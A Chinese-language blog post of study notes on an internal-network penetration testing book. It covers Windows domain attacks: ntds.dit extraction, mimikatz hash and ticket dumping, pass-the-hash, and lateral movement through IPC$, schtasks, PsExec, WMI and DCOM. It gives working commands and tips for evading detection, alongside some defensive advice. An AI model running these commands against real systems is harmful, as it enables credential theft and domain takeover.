<p>UAC有四种设置要求：<strong>始终通知</strong>、<strong>仅在程序试图更改我的计算机时通知我（默认）</strong>、仅在程序试图更改我的计算机时通知我（不降低桌面的亮度）、<strong>从不提示</strong>。</p>
<p>BypassUAC有点这个意思：仅在程序试图更改我的计算机时通知我（默认） –&gt; 从不提示。</p>
<p>防御：企业环境中防止绕过UAC最好的方法是不让内网机器的使用者拥有本地管理员权限，从而降低系统遭受攻击的可能性；家庭环境下设为始终通知，总是弹窗警告。</p>
<p>详细介绍:<br><a href="https://www.baidu.com/link?url=N2TIhhJT_ZyS1dmKG9Wy-h4pUfXawR5bYETaK2DEWFau3-tsu2rVmZ4tBI1ls_A4k1McEto0-UAX-I94ufxZp9Reb-mjBvn3avp_mSRAhsq&wd=&eqid=bffae42e00015b0600000006622b1268" target="_blank" rel="noopener">Metasploit中的BypassUAC模块:</a></p>
<h2 id="令牌窃取"><a href="#令牌窃取" class="headerlink" title="令牌窃取"></a>令牌窃取</h2><p><strong>令牌（Token）是指系统中的临时秘钥，相当于账户和密码</strong>，用于决定是否允许当前请求及判断当前请求是属于哪个用户的。</p>
<p>获取了令牌，就可以在不提供密码或其他凭证的情况下访问网络和系统资源。</p>
<p>访问令牌（Access Token）代表访问控制操作主体的系统对象。密保令牌（Security Token）也叫做认证令牌或者硬件令牌，是一种用于实现计算机身份校验的物理设备，例如U盾。会话令牌（Session Token是交互会话中唯一的身份标识符）。</p>
<p><strong>伪造令牌攻击的核心是Kerberos协议。</strong></p>
<p>如果目标系统中存在有效的令牌，可以通过Rotten Potato程序快速模拟用户令牌来实现权限提升。</p>
<p>假设网络中设置了域管理进程，Metasploit使用ps寻找并使用migrate命令迁移至该进程，若成功了可以直接添加域管理员<code>net user name pass /ad /domain</code>，添加域管理员组<code>net group &quot;domain admins&quot; name /ad /domain</code>。</p>
<p>详细介绍:<br><a href="https://www.wangan.com/articles/1192" target="_blank" rel="noopener">Windows 令牌窃取几种方式</a></p>
<p>Pass The Hass攻击见第5章。</p>
<p>防御：补丁、禁止来路不明的文件、令牌时效性、加密存储和多重验证保护、加密链路传输。</p>
<h2 id="无凭证条件下的权限获取"><a href="#无凭证条件下的权限获取" class="headerlink" title="无凭证条件下的权限获取"></a>无凭证条件下的权限获取</h2><p>LLMNR和NetBIOS欺骗攻击。</p>
<hr>
</font>

<font size=4 >

<h1 id="5-域控制器安全"><a href="#5-域控制器安全" class="headerlink" title="5.域控制器安全"></a>5.域控制器安全</h1><p>《内网安全攻防：渗透测试实战指南》第6章：域控制器安全</p>
<p>在实际网络环境中，攻击者渗透内网的终极目标是获取域控制器的权限，从而控制整个域。</p>
<p>本章介绍了使用Kerberos域用户提权和导出ntds.dit中散列值的方法，并针对域控制器攻击提出了有效的安全建议。看了下书上的内容，大多是教程相关的内容.所以不作详细命令介绍,用到百度就行.</p>
<h2 id="使用卷影拷贝服务提取ntds-dit"><a href="#使用卷影拷贝服务提取ntds-dit" class="headerlink" title="使用卷影拷贝服务提取ntds.dit"></a>使用卷影拷贝服务提取ntds.dit</h2><p>在活动目录中，所有的数据都被保存在ntds.dit文件中。ntds.dit是一个二进制文件，存储在DC的<code>C:\Windows\NTDS\ntds.dit</code>，<strong>包含了域内的所有信息，可以通过分析ntds.dit导出域内的计算机信息及其他信息。</strong>它和SAM文件一样，是被系统锁定的。</p>
<p><strong>卷影拷贝服务（Volume Shadow Copy Service，VSS）提取ntds.dit。</strong>VSS本质上属于快照（snapshot）技术，主要用于备份和恢复（即使目标文件处于锁定状态）。</p>
<p><strong>ntdsutil.exe：</strong><br>为AD提供管理机制的命令行工具，支持Windows2003、2008、2012。</p>
<p>在域控制器的命令行环境下输入如下命令,创建一个快照。该快照包含windows中的所有文件，且在复制文件时不会受到windows锁定机制的限制:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">ntdsutil snapshot &quot;activate instance ntds&quot; create quit quit</span><br><span class="line"></span><br><span class="line">//执行完毕后，会发现创建了guid为&#123;123456&#125;的快照</span><br><span class="line">ntdsutil snapshot &quot;mount &#123;123456&#125;&quot; quit quit</span><br><span class="line"></span><br><span class="line">//执行完后，会有一个路径，我这的路径是c:\$SNAP_202203041824_VOLUMEC$</span><br><span class="line">//cmd下使用,powershell不行:</span><br><span class="line">copy c:\$SNAP_202203041824_VOLUMEC$\Windows\NTDS\ntds.dit c:\ntds.dit</span><br><span class="line"></span><br><span class="line">//输入如下命令，将之前加载的快照卸载并删除:</span><br><span class="line">ntdsutil snapshot &quot;unmount &#123;123456&#125;&quot; &quot;delete &#123;123456&#125;&quot; quit quit</span><br></pre></td></tr></table></figure>

<p><strong>vssown.vbs:</strong><br>(和ntdsutil操作类似)cmd下输入:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">//启动卷影拷贝服务</span><br><span class="line">cscript vssown.vbs /start</span><br><span class="line"></span><br><span class="line">//创建一个c盘的卷影拷贝</span><br><span class="line">cscript vssown.vbs /create c</span><br><span class="line"></span><br><span class="line">//列出当前卷影拷贝</span><br><span class="line">cscript vssown.vbs /list</span><br><span class="line"></span><br><span class="line">//copy 出来</span><br><span class="line">copy c:\$SNAP_202203041824_VOLUMEC$\Windows\NTDS\ntds.dit c:\ntds.dit</span><br><span class="line"></span><br><span class="line">//删除卷影拷贝</span><br><span class="line">cscript vssown.vbs /delete &#123;123456&#125;</span><br></pre></td></tr></table></figure>

<p><strong>vssadmin：</strong><br>是Windows 7及2008提供的VSS管理工具。。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://zhuanlan.zhihu.com/p/258126987</span><br></pre></td></tr></table></figure>


<p><strong>也可以使用ntdsutil的IFM创建卷影拷贝。</strong></p>
<p><strong>diskshadow.exe</strong>，可以使用VSS并导出ntds.dit。微软官方出品，代码由微软签名，Windows 2008、2012、2016默认自带。导出ntds.dit时必须在<code>C:\Windows\system32</code>中操作。</p>
<p>导出ntds.dit后，可以利用reg将syste.hive转储。因为<strong>system.hive中存放着ntds.dit的秘钥</strong>，如果没有该秘钥将无法查看ntds.dit中的信息。</p>
<p>在渗透测试中，应该先将含有需要执行的命令的文本文件写入到远程目标系统，在使用diskshadow.exe调用执行该文件，使用更为灵活。</p>
<h2 id="导出ntds-dit中的散列值"><a href="#导出ntds-dit中的散列值" class="headerlink" title="导出ntds.dit中的散列值"></a>导出ntds.dit中的散列值</h2><p>e.g. esedbexport、impacket中的secresdump、NTDSDumpex.exe解析ntds.dit并<strong>导出域账号和域散列值。</strong></p>
<h2 id="利用dcsync获取域散列值"><a href="#利用dcsync获取域散列值" class="headerlink" title="利用dcsync获取域散列值"></a>利用dcsync获取域散列值</h2><p><strong>mimikatz有个dcsync功能</strong>，可以利用卷影拷贝服务VSS直接读取ntds.dit并检索域散列值。但是，<strong>需要域管理员权限</strong>运行mimikatz才可以。<code>lsadump::dcsync</code></p>
<p>也可以通过转储lsass.exe进程对散列值进行dump操作。<code>lsadump::lsa</code></p>
<p>mimikatz命令执行结果太多，无法将其完全显示出来，可以先执行log命令（会在当前目录下生成一个文本文件，用于记录mimikatz的所有执行结果）。</p>
<h2 id="其他获取域散列值方法"><a href="#其他获取域散列值方法" class="headerlink" title="其他获取域散列值方法"></a>其他获取域散列值方法</h2><p>e.g. Metasploit、vshadow.exe和QuarkPwDump.exe</p>
<p>QuarkPwDump.exe:<br><a href="https://github.com/quarkslab/quarkspwdump">https://github.com/quarkslab/quarkspwdump</a></p>
<p>在正常的域环境下，ntds.dit文件里包含大量的信息，体积较大、不方便保存到本地。如果域控制器上没有安装杀软，攻击者就能直接进入域控制器，导出ntds.dit并获得域账号和域散列值，而不需要将nts.dit保存到本地。</p>
<h2 id="Kerberos域用户提权漏洞"><a href="#Kerberos域用户提权漏洞" class="headerlink" title="Kerberos域用户提权漏洞"></a>Kerberos域用户提权漏洞</h2><p>MS14-068、CVE-2014-6324、KB3011780，Windows2012 R2前均受影响。</p>
<p>如果攻击者获取了域内任何一台计算机的shell权限，同时知道<strong>任意域用户的用户名、SID、密码</strong>，即可获得域管理员权限，进而控制DC，最终获取域权限。</p>
<p><strong>票据注入一般流程</strong>：查看DC的补丁安装情况（systeminfo、WMIC qfe）、查看用户的SID（whoami &#x2F;user）、生成高权限票据（ms14-068.exe）、查看注入前的权限（dir \\DC\c$）、清除内存中的所有票据（mimikatz，kerberos::purge）、将高权限票据注入内存（kerberos::ptc）、验证权限。</p>
<p>e.g. meterpreter下load kiwi</p>
<p>修复建议：开启Windows Update、手动补丁、对域内账号进行控制、禁止使用弱口令、及时定期修改密码、安装反病毒软件、及时更新病毒库。</p>
<hr>
</font>

<font size=4 >

<!-- more -->

<h1 id="6-域内横向移动分析及防御"><a href="#6-域内横向移动分析及防御" class="headerlink" title="6.域内横向移动分析及防御:"></a>6.域内横向移动分析及防御:</h1><p>《内网安全攻防：渗透测试实战指南》第5章：域内横向移动分析及防御</p>
<p>在内网中，从一台主机移动到另外一台主机，可以采取的方式通常有文件共享、计划任务、远程连接工具、客户端等。</p>
<p>本章系统的介绍了域内横向移动的主要方法，复现并剖析了内网域方面最重要、最经典的漏洞，同时给出了相应的防范方法。本章内容包括：常见远程连接方式的剖析；从密码学角度理解NTLM协议；PTT和PTH的原理；如何利用PsExec、WMI、smbexec进行横向移动；Kerberos协议的认证过程；Windows认证加固方案；Exchange邮件服务器渗透测试。</p>
<h2 id="1-IPC"><a href="#1-IPC" class="headerlink" title="1.IPC"></a>1.IPC</h2><p>IPC（Internet Process Connection）是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限，<strong>通过ipc$可以与目标机器建立连接，利用这个连接可以在目标机器上运行命令。</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">建立IPC连接：</span><br><span class="line">net use \\10.10.10.11\ipc$ &quot;这里填密码&quot; /user:TonyD0g\administrator</span><br><span class="line"></span><br><span class="line">断开IPC连接:</span><br><span class="line">(在删除IPC连接时,要确认删除的是自己创建的IPC)</span><br><span class="line">net use \\10.10.10.10\ipc$ /del</span><br><span class="line"></span><br><span class="line">测试是否连接：</span><br><span class="line">net use</span><br><span class="line"></span><br><span class="line">dir操作:</span><br><span class="line">dir \\192.168.1.10\c$</span><br><span class="line"></span><br><span class="line">tasklist操作:</span><br><span class="line">tasklist /S 192.168.1.10 /U administrator /P TonyD0g</span><br></pre></td></tr></table></figure>

<h2 id="2-at-Windows-server-2008之前-计划任务命令"><a href="#2-at-Windows-server-2008之前-计划任务命令" class="headerlink" title="2.at(Windows server 2008之前)计划任务命令:"></a>2.at(Windows server 2008之前)计划任务命令:</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">at \\192.168.1.10 4:11PM C:\shell.bat</span><br><span class="line"></span><br><span class="line">创建之后会有一个任务ID，指定任务ID可以删除(执行完后一定要删除，防止管理员察觉到)</span><br><span class="line">at \\192.168.1.10 7 /delete</span><br><span class="line"></span><br><span class="line">计划任务执行ipconfig,并将结果输出到c:\1.txt:</span><br><span class="line">at \\10.10.10.11 9:00pm cmd.exe /c &quot;ipconfig &gt;c:\1.txt&quot;</span><br><span class="line"></span><br><span class="line">使用type命令远程读取c:\1.txt:</span><br><span class="line">type \\10.10.10.11\c$\1.txt</span><br></pre></td></tr></table></figure>

<h2 id="3-schtasks"><a href="#3-schtasks" class="headerlink" title="3.schtasks"></a>3.schtasks</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">(前提:建立IPC连接)</span><br><span class="line"></span><br><span class="line">在远程主机上创建一个名称为&quot;test&quot;的计划任务,该计划任务在开机时启动，启动程序为C:\calc.bat,启动权限为System,命令如下:</span><br><span class="line">schtasks /create /s 10.10.10.11 /tn test /sc onstart /tr C:\calc.bat /ru system /f</span><br><span class="line"></span><br><span class="line">执行如下命令运行&quot;test&quot;计划任务:</span><br><span class="line">schtasks /run /s 10.10.10.11 /i /tn &quot;test&quot;</span><br><span class="line"></span><br><span class="line">在使用schtasks命令时,会在系统上留下日志文件c:\Windows\Tasks\SchedLgU.txt</span><br><span class="line">如果执行schtasks命令后并没有回显,可以配合ipc执行文件，使用type命令远程查看执行结果.</span><br></pre></td></tr></table></figure>

<p>利用条件：开启139、445端口；管理员开启了默认共享。</p>
<h2 id="4-HashDump"><a href="#4-HashDump" class="headerlink" title="4.HashDump"></a>4.HashDump</h2><p>windows操作系统通常使用两种方法对用户的明文密码进行加密处理.在域环境中,用户信息存储在ntds.dit中,加密后为hash.<br>windows的密码分为LM Hash 和NTLM Hash</p>
<p>LM Hash，“LAN Manager Hash”，本质是DES加密，还是硬编码密钥，从Windows Vista和Windows Server 2008开始默认禁用，dump出的LM Hash为“<strong>aad</strong>3b435b51404eeaad3b435b51404ee”表示为空或被禁用。</p>
<p>NTLM Hash，“New Technology LM Hash”，MD4加密。</p>
<p>Hash散列可以通过在线数据库、彩虹表等来破解，也可以使用PTH（Pass the Hash 哈希传递）来进行横向渗透。</p>
<p><strong>要想在Windows操作系统中抓取散列值或明文密码，必须将权限提升至System。</strong>本地用户名、散列值和其他安全验证信息都保存在SAM文件中。lsass.exe进程用于实现Windows的本地安全策略和登陆策略。<strong>可以使用工具将散列值和明文密码从内存中的lsass.exe进程或SAM文件中导出。</strong></p>
<p>e.g. GetPassword、PwDump7、QuarksPwDump、mimikatz、PowerShell</p>
<p>SAM文件保存位置<code>C:\Windows\System32\config</code>，该文件不允许复制，但可以使用U盘进入PE系统进行复制。</p>
<h2 id="5-mimikatz"><a href="#5-mimikatz" class="headerlink" title="5.mimikatz:"></a>5.mimikatz:</h2><p><strong>利用reg导出SAM和System文件，通过mimikatz或者Cain来从文件读取hash。:</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">reg:</span><br><span class="line">reg save hklm\sam sam.hive</span><br><span class="line">reg save hklm\system system.hive</span><br><span class="line"></span><br><span class="line">导出的sam.hive和system.hive 放在mimikatz目录下,再运行下面的代码:</span><br><span class="line">运行mimikatz,并输入:</span><br><span class="line">privilege::debug</span><br><span class="line">&quot;token::elevate&quot; </span><br><span class="line">lsadump::sam /sam:sam.hive /system:system.hive</span><br></pre></td></tr></table></figure>

<p><strong>(获取NTLM Hash)使用mimikatz在线读取sam文件:</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">在mimikatz目录下用 cmd/powershell 输入:</span><br><span class="line">.\mimikatz.exe &quot;privilege::debug&quot; &quot;log&quot; &quot;sekurlsa::logonpasswords&quot;</span><br></pre></td></tr></table></figure>

<p><strong>密码防抓取:Wdigest功能:</strong><br>wdigest功能被关闭后,无法从内存中获取明文密码.所以我们要开启wdigest<br>windows Server 2012 及以上版本默认关闭wdigest,<br>windows Server 2012以下版本,如果安装了KB2871997，攻击者同样无法获取明文密码.</p>
<p>使用reg add命令启动wdigest,以保证攻击者能利用:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f</span><br></pre></td></tr></table></figure>

<p><strong>利用任务管理器或者微软出品的Procdump导出lsass.dmp文件，通过mimikatz来从内存文件中获取hash。:</strong><br>任务管理器&#x3D;&gt;进程&#x3D;&gt;右键选”创建转存文件”</p>
<h2 id="6-破解hash-防范方法"><a href="#6-破解hash-防范方法" class="headerlink" title="6.破解hash,防范方法:"></a>6.破解hash,防范方法:</h2><p><a href="https://xz.aliyun.com/t/11199#toc-7" target="_blank" rel="noopener">dumphash免杀</a><br><a href="https://links.jianshu.com/go?to=https://www.pconlife.com/viewfileinfo/avdump-exe/" target="_blank" rel="noopener">AvDump下载</a></p>
<p>Hashcat只支持CPU破解；oclHashcat支持GPU破解（AMD、NIVDA），支持破解Windows密码、Linux密码、Office密码、Wi-Fi密码、MySQL密码、SQL Server密码，以及由MD5、SHA1、SHA256等国际主流加密算法加密的密码。</p>
<p><strong>如何防范hashdump？</strong></p>
<p>1、Windows Server 2012 R2新增了一个名为受保护的用户组（Protected Users），只要将需要保护的用户放入该组，攻击者就无法使用mimikatz等工具抓取明文密码和散列值了。</p>
<p>2、安装KB2871997，是微软用来解决PsExec或IPC远程查看（c$）问题的补丁，能是本地账号不再被允许远程接入计算机系统，<strong>但是SID&#x3D;500的本地管理员账号（默认Administrator）除外</strong>。</p>
<p>3、微软在Windows XP中添加了一个名为WDigest的协议，该协议能够使Windows将明文密码存储在内存中，以方便用户登录本地计算机。</p>
<p>4、根据Debug权限确定哪些用户可以将调试器附加到任何进程或内核中，默认情况下只有Administrator。mimikatz在抓取散列值或明文密码时需要使用Debug权限（因为mimikatz需要和lsass进程进行交互）。将Administrator从Debug组中移除。</p>
<h2 id="7-哈希传递攻击-PTH-需要本地管理员权限"><a href="#7-哈希传递攻击-PTH-需要本地管理员权限" class="headerlink" title="7.哈希传递攻击:PTH(需要本地管理员权限)"></a>7.哈希传递攻击:PTH(需要本地管理员权限)</h2><p>PTH（Pass the Hash 哈希传递）。在域环境中，用户登录计算机时使用的大都是域账号，<strong>大量计算机在安装时会使用相同的本地管理员账号和密码</strong>，因此，攻击者就能使用哈希传递攻击的方法登录内网中的其他计算机。</p>
<p>在Windows网络中，散列值就是用来证明身份的（有正确的用户名和密码散列值，就能通过验证）。从Windows Server 2012 R2开始，默认在内存中不会记录明文密码，因此，<strong>攻击者往往会使用工具将散列值传递到其他计算机中，进行权限验证，实现对远程计算机的控制。</strong></p>
<p>进行身份验证时，不会使用明文口令，而是将明文口令通过系统API转换成散列值，再与数据库中存储的散列值进行对比，如果完全相同则表示验证成功。不过，攻击者在获得密码散列值之后，依旧可以使用pth攻击来模拟用户进行验证。</p>
<p><strong>使用NTLM Hash进行哈希传递:</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">mimikatz目录下,输入:($NTLMHash,tonydog.lab为变量)</span><br><span class="line">.\mimikatz.exe privilege::debug </span><br><span class="line">sekurlsa::pth /user:administrator /domain:tonydog.lab /ntlm:$NTLMHash</span><br><span class="line"></span><br><span class="line">执行完后，在所弹出的cmd中输入下列指令来确认是否连接成功:</span><br><span class="line">dir \\10.10.10.10\c$</span><br></pre></td></tr></table></figure>

<p><strong>使用AES-256秘钥进行哈希传递(PTK):</strong>(必须安装kb2871997,且需要本地管理员权限)。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">.\mimikatz.exe &quot;privilege::debug&quot; &quot;sekurlsa::ekeys&quot;</span><br><span class="line">sekurlsa::pth /user:administrator /domain:tonydog.lab /aes256:$aes256</span><br></pre></td></tr></table></figure>

<h2 id="8-PTT-票据传递-不需要本地管理员权限"><a href="#8-PTT-票据传递-不需要本地管理员权限" class="headerlink" title="8.PTT(票据传递,不需要本地管理员权限):"></a>8.PTT(票据传递,不需要本地管理员权限):</h2><p>要想使用mimikatz的哈希传递功能，必须具有本地管理员权限。mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法，例如票据传递（Pass the Ticket，PTT）。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">.\mimikatz.exe &quot;privilege::debug&quot; &quot;sekurlsa::tickets /export&quot;</span><br><span class="line"></span><br><span class="line">执行以上命令后，会在当前目录下出现多个服务的票据文件,例如krbtgt,cifs,ldap等;</span><br><span class="line">mimikatz清除内存中的票据:</span><br><span class="line">kerberos::purge</span><br><span class="line"></span><br><span class="line">将票据文件注入内存,命令:</span><br><span class="line">.\mimikatz.exe kerberos::ptt &quot;票据路径&quot; </span><br></pre></td></tr></table></figure>

<p>其次还有keko进行票据传递</p>
<h2 id="9-PsExec"><a href="#9-PsExec" class="headerlink" title="9.PsExec"></a>9.<a href="https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec" target="_blank" rel="noopener">PsExec</a></h2><p><strong>PsExec是微软官方PsTools工具包中的软件</strong>，期初主要是用于大批量Windows主机的运维，在域环境下效果甚好。</p>
<p>通过PsExec，可以在远程计算机上执行命令，<strong>也可以将管理员权限提升到System权限</strong>以运行指定的程序。</p>
<p>PsExec的基本原理是：通过管道在远程目标计算机上创建一个psexec服务，并在本地磁盘中生成一个名为“PSEXECSVC”的二进制文件，然后通过psexec服务运行命令，运行结束后删除任务。</p>
<p>需要远程系统开启admin$共享（默认是开启的），会产生大量日志。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">(前提:建立ipc连接)</span><br><span class="line">System权限:</span><br><span class="line">.\PsExec.exe -accepteula \\10.10.10.10 -s cmd.exe</span><br><span class="line"></span><br><span class="line">Administrator权限:</span><br><span class="line">.\PsExec.exe -accepteula \\10.10.10.10 cmd.exe</span><br><span class="line"></span><br><span class="line">(或者加两个参数)</span><br><span class="line">.\PsExec.exe -accepteula \\10.10.10.10 -u administrator -p Server2012 -s cmd.exe</span><br><span class="line"></span><br><span class="line">执行完后，在弹出的终端上进行控制即可</span><br></pre></td></tr></table></figure>

<p>Metasploit中也有psexec模块,不赘述.</p>
<h2 id="10-WMI"><a href="#10-WMI" class="headerlink" title="10.WMI"></a>10.WMI</h2><p>WMI，Windows Management Instrumentation，从Windows 98开始支持，可以在本地或者远程管理计算机系统。</p>
<p>自从PsExec在内网中被严格监控后，越来越多的反病毒厂商将PsExec加入了黑名单，于是攻击者逐渐开始使用WMI进行横向移动。通过渗透测试发现，在使用wmiexec进行横向移动时，<strong>Windows默认不会记录WMI的操作日志。</strong></p>
<p>使用wmic远程执行命令，在远程系统中启动Windows Management Instrumentation服务（<strong>目标服务器需要开放135端口，wmic会以管理员权限在远程系统中执行命令</strong>）。如果服务器开启了防火墙，wmic将无法进行连接。此外，wmic命令如果没有回显，可以将命令结果输出到某文件，并使用ipc$和type来读取信息。<strong>如果wmic执行的是恶意程序，将不会留下日志。</strong></p>
<p><strong>e.g. wmic、wmiexec.py、wmiexec.vbs、Invoke-WmiCommand.ps1、Invoke-WMIMethod,smbexec的使用大同小异,自行百度.</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">wmiexec.vbs:</span><br><span class="line">输入以下命令，获得一个半交互式的shell:</span><br><span class="line">cscript.exe //nologo wmiexec.vbs /shell 10.10.10.10 administrator Server2012</span><br><span class="line"></span><br></pre></td></tr></table></figure>


<h2 id="11-DCOM"><a href="#11-DCOM" class="headerlink" title="11.DCOM"></a>11.DCOM</h2><p>DCOM（Distributed Component Object Model，分布式组件对象模型）是微软的一系列概念和程序接口。通过DCOM，客户端程序对象能够对网络中的另一台计算机上的服务器程序对象发送请求。</p>
<p>DCOM是基于组件对象模型（COM）的。COM提供了一套允许在同一台计算机上的客户端和服务端之间进行通信的接口。</p>
<p>执行流程同样：通过ipc$连接远程计算机；执行命令。</p>
<p><strong>获取DCOM程序列表:</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">windows7,windows server2008 :</span><br><span class="line">Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication</span><br><span class="line"></span><br><span class="line">windows server2012及以上版本:</span><br><span class="line">Get-CimInstance Win32_DCOMApplication</span><br></pre></td></tr></table></figure>

<p><strong>使用DCOM执行任意命令:</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">在本地启动一个管理员权限的powershell,执行如下命令,将弹出一个计算器:</span><br><span class="line">$com = [activator]::CreateInstance([type]::GetTypeFromProgID(&quot;MMC20.Application&quot;,&quot;127.0.0.1&quot;))</span><br><span class="line"></span><br><span class="line">$com.Document.ActiveView.ExecuteShellCommand(&#x27;cmd.exe&#x27;,$null,&quot;/c calc.exe&quot;,&quot;Minimized&quot;)</span><br><span class="line"></span><br><span class="line">使用dcom在远程机器上执行命令:百度,不赘述.</span><br></pre></td></tr></table></figure>

<h2 id="12-SPN"><a href="#12-SPN" class="headerlink" title="12.SPN"></a>12.SPN</h2><p>微软给与内的每种资源分配了不同的服务主体名称（Service Principal Name，SPN）。</p>
<p>因为域环境中的每台服务器都需要在Kerberos身份验证服务中注册SPN，所以攻击者会直接向域控制器发送查询请求，获取其需要的服务的SPN，<strong>从而知晓其需要使用的服务资源在哪台机器上</strong>。</p>
<p>SPN扫描也称作“扫描Kerberos服务实例名称”，<strong>在活动目录中发现服务的最佳方法就是SPN扫描</strong>。与网络端口扫描相比，SPN扫描的主要特点是不需要通过连接网络中的每个IP地址来检查服务端口（不会因触发内网中的IPS、IDS等设备的规则而产生大量的警告日志）。因为SPN查询是Kerberos票据行为的一部分，所以检测难度较大。</p>
<p>SPN是通过LDAP协议向域控制器进行查询的，所以，攻击者只要获得一个<strong>普通的域用户权限</strong>就可以进行SPN扫描。</p>
<p>Kerberoast攻击。导出票据，破解票据。</p>
<p>防御：确保服务账号密码的长度超过25位；确保密码的随机性（避免相同）；定期修改密码。</p>
<h2 id="13-Exchange"><a href="#13-Exchange" class="headerlink" title="13.Exchange"></a>13.Exchange</h2><p>电子邮件中可能包含大量的源码、企业内部通讯录、明文密码、敏感业务登陆地址及可以从外网访问内网的VPN账号密码等信息。</p>
<p><strong>Exchange支持PowerShell对其进行本地或远程操作。</strong></p>
<p>邮箱服务器、客户端访问服务器、集线传输服务器是核心角色，只要部署这三个角色就能提供基本的电子邮件处理功能，且这仨可以部署在同一台主机上。</p>
<p>邮件发送使用统一的通信协议，即SMTP（简单邮件传输协议）；邮件接收则会使用多种协议标准，如从POP（邮局协议）发展而来的POP3，以及使用较为广泛的IMAP（Internet邮件访问协议）。Exchange开发了私有的MAPI协议用于收取邮件。</p>
<p>Exchange支持的访问接口和协议：</p>
<ul>
<li><strong>OWA（Outlook Web App）：Exchange提供的Web邮箱。</strong></li>
<li><strong>EAC（Exchange Administrative Center）：Exchange管理中心，后台。</strong></li>
<li>Outlook Anywhere（RPC-over-HTTP，RPC&#x2F;HTTP）</li>
<li>MAPI（MAPI-over-HTTP，MAPI&#x2F;HTTP）</li>
<li>Exchange ActiveSync（EAS，XML&#x2F;HTTP）</li>
<li>Exchange Web Service（EWS，SOAP-over-HTTP）</li>
</ul>
<p>Exchange服务发现：基于端口扫描发现（nmap）、<strong>SPN查询（在安装Exchange时，SPN就被注册在AD中了）</strong>。</p>
<p>Exchange数据库的后缀为“.edb”，存储在Exchange服务器上，使用PowerShell可以查看相应信息。</p>
<p>Exchange邮件的文件后缀为“.pst”。</p>
<p>UNC（Universal Naming Convention，通用命名规则，也称通用命名规范、通用命名约定）。类似于<code>\\hostname\sharename</code>，<code>\\ip\address\sharename</code>的网络路径就是UNC路径，sharename为网络共享名称。</p>
<hr>
</font>



<font size=4 >

<!-- more -->



